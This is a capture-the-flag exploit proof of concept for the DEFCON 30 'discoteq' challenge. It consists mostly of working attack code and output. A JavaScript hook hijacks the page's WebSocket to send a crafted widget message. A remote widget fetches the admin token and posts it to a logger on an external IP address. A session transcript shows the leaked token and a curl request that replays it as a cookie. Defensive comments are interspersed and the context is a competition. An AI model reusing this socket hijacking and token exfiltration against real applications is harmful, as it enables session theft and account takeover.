DEFCON 30 discoteq exploit PoC
// run before send
// Wrap WebSocket.prototype.send so that every socket instance that sends a
// message is recorded in window.sockets. The payload below reuses the first
// recorded socket, i.e. the page's own existing connection. Defender's note:
// because this hook runs inside the victim-side page, nothing about a message
// arriving over an established socket makes its fields trustworthy; the
// server has to validate them (here, the widget source) on receipt.
const originalSend = WebSocket.prototype.send;
window.sockets = [];
WebSocket.prototype.send = function (...args) {
  const socket = this;
  if (!window.sockets.includes(socket)) {
    window.sockets.push(socket);
  }
  return originalSend.apply(socket, args);
};
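// run after send
// Crafted "widget" message, sent over the first socket captured by the hook
// above (window.sockets[0] is undefined if nothing has been sent yet). The
// `widget` and `flag_url` fields name a source on an external host rather
// than the app's own origin; that is the weakness this PoC demonstrates, and
// the fix belongs in the app (accept widget sources and api_post targets only
// from an allow-listed origin), not in this script.
// `data` is declared with const instead of being created as an implicit
// global by a bare assignment.
const data = {
  type: 'widget',
  widget: '@158.101.144.10/defcon_exp/exploit.php',
  author: {
    user: '1234#f8d4d5ab',
    platform: 'web',
  },
  recipients: ['admin#13371337'],
  data: {
    message: 'styyyyyyyyyyyyyyyyyy',
    flag_url: '@158.101.144.10/defcon_exp/logger.php',
    apiGet: '/api/poll/options?poll=e86188d3-5e28-4b85-b1ba-231504a37495',
    apiVote: '/api/poll/vote?poll=e86188d3-5e28-4b85-b1ba-231504a37495',
  },
};
window.sockets[0].send(JSON.stringify(data));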
import core.widgets;
import core.material;
import local;
// Remote widget in rfw text format. `root` carries one piece of state,
// `loaded`, which starts false, so the `false` branch of the switch below
// renders first.
widget root { loaded: false } = Container(
child: Column(
mainAxisAlignment: "center",
children: [
switch state.loaded {
// Second phase: `data.new_token` (filled in by the first ApiMapper) is shown
// and then forwarded. `data.data.apiGet` and `data.data.flag_url` are
// presumably the `apiGet` / `flag_url` fields of the message that delivered
// this widget, i.e. values chosen by the message author -- verify against
// the app's widget data plumbing.
true: Column(
children: [
Text(
text: data.new_token
),
ApiMapper(
url: data.data.apiGet,
jsonKey: "options",
dataKey: "poll_result",
// Exfiltration step: the api_post event sends the freshly fetched token to a
// message-supplied path. The defensive fix is in the app's api_post handler
// (accept only same-origin / allow-listed paths), not in this file.
onLoaded: event "api_post" {
path: data.data.flag_url,
body: {admin_token: data.new_token}
}
),
],
),
// First phase: ApiMapper is an app-specific widget; from its use here it
// appears to fetch `url` and store the `jsonKey` field of the response under
// `dataKey` -- TODO confirm against the app's widget library. When it has
// loaded, the state flips and the switch re-renders the `true` branch.
false: ApiMapper(
url: "/api/token",
jsonKey: "new_token",
dataKey: "new_token",
onLoaded: set state.loaded = true
),
},
],
),
);
# Session transcript (prompts and output included; not a runnable script).
$ snap install flutter
$ dart rfw_compile.dart
$ // upload exploit.rfw, send to admin, get admin_token
# Body as received by the logger endpoint: the token arrived as a JSON array
# of single characters rather than one string -- presumably the widget
# runtime serialised the string value element-wise; confirm against the
# app's api_post handler.
$ cat /tmp/leaked_token
{"admin_token":["a","d","m","i","n","%","2","3","1","3","3","7","1","3","3","7",".","0","c","g","U","R","K","T","-","O","7","O","p","O","Q","K","a","g","F","q","v","5","h","3","i","W","2","c","5","c","f","9","s","i","D","1","4","u","u","h","3","-","0","U"]
# The reassembled token is presented as the session cookie. Detection note
# (inferred): a token minted via /api/token and then presented by a client
# other than the one that requested it is the server-side signal, if the app
# logs token issuance and use.
$ curl "http://discoteq-thl53at4nuzlm.shellweplayaga.me/api/flag" -H "Cookie: token=admin#13371337.0cgURKT-O7OpOQKagFqv5h3iW2c5cf9siD14uuh3-0U" -d '{"ticket":"ticket{...}"}
{"flag":"flag{AnchorJackline3058n22:ydHlchqaomMyj_wH7Bke3CcIAVY_Y5wwn02c66s4QU17GdcW1NhliZgpHxOd6EZpkvlkJjjm9CF95K37nGfA1g}"}
// snap install dart
// dart rfw_compile.dart
import 'dart:io';
import 'package:rfw/formats.dart';
/// Converts the text-format widget definition (exploit.rfwtxt) into the
/// binary library blob (exploit.rfw) using the rfw package's parser and
/// encoder. Reads and writes only the two local files; both file names are
/// fixed.
void main() {
  final File source = File('exploit.rfwtxt');
  final File target = File('exploit.rfw');
  final library = parseLibraryFile(source.readAsStringSync());
  target.writeAsBytesSync(encodeLibraryBlob(library));
}